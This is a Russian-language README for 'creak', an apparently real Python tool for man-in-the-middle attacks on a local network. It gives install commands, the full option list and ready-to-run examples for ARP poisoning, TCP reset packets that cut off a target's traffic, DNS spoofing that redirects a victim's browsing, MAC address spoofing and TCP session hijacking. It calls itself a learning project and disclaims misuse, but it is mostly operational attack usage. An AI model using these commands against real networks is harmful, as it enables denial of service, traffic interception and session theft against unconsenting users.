
Отравление, сброс, подмена, перенаправление MITM-скрипт
Выполняет одни из самых известных MITM-атак на целевые адреса в локальной сети. Среди них — блокировка навигации и возможности загрузок целевого хоста в локальной сети путём ARP-отравления и отправки сбросных TCP-пакетов на каждый запрос к маршрутизатору. Создан как учебный проект для изучения языка Python; я снимаю с себя всякую ответственность за любое злоупотребление, включая вредоносное или незаконное использование этого кода.
$ git clone https://github.com/codepr/creak.git
$ cd creak
$ python setup.py install
или просто клонируйте репозиторий и запустите creak.py после установки всех зависимостей:
$ git clone https://github.com/codepr/creak.git
Требуется установить библиотеки pcap для низкоуровневой работы с пакетами и модуль dpkt; для опций спуфинга DNS необходимо установить модуль dnet из пакета libdnet (не путайте с pydnet — инструментом оценки сети).
При желании можно также использовать scapy, для этого нужно указать его в файле config в разделе [output] > ENGINE.
Usage: creak.py [options] dev
Options:
-h, --help show this help message and exit
-1, --sessions-scan Sessions scan mode
-2, --dns-spoof Dns spoofing
-3, --session-hijack Try to steal a TCP sessions by desynchronization (old technique)
-x, --spoof Spoof mode, generate a fake MAC address to be used
during attack
-m MACADDR Mac address octet prefix (could be an entire MAC
address in the form AA:BB:CC:DD:EE:FF)
-M MANUFACTURER Manufacturer of the wireless device, for retrieving a
manufactur based prefix for MAC spoof
-s SOURCE Source ip address (e.g. a class C address like
192.168.1.150) usually the router address
-t TARGET Target ip address (e.g. a class C address like
192.168.1.150), can be specified multiple times
-p PORT Target port to shutdown
-a HOST Target host that will be redirect while navigating on
target machine
-r REDIR Target redirection that will be fetched instead of host
on the target machine
-v, --verbose Verbose output mode
-d, --dotted Dotted output mode
Самый простой вариант использования: Заблокировать весь трафик на целевой хост
$ python creak.py -t 192.168.1.30 wlan0
Указать другой шлюз:
$ python creak.py -s 192.168.1.2 -t 192.168.1.30 wlan0
Указать другой MAC-адрес устройства:
$ python creak.py -m 00:11:22:33:44:55 -t 192.168.1.30 wlan0
Подмена MAC-адреса с генерацией случайного:
$ python creak.py -x -t 192.168.1.30 wlan0
Подмена MAC-адреса с генерацией на основе производителя (например, Xeros):
$ python creak.py -x -M xeros -t 192.168.1.30 wlan0
Спуфинг DNS с использованием поддельного MAC-адреса, перенаправление ab.xy на cd.xz (например, localhost):
$ python creak.py -x -M xeros -t 192.168.1.30 -a www.ab.xy -r www.cd.xz wlan0
Блокировка нескольких хостов в подсети:
$ python creak.py -x -t 192.168.1.30 -t 192.168.1.31 -t 192.168.1.32 wlan0
См. файл CHANGELOG.
Scapy (начато)См. файл LICENSE для получения информации о правах и ограничениях лицензии (GNU v3).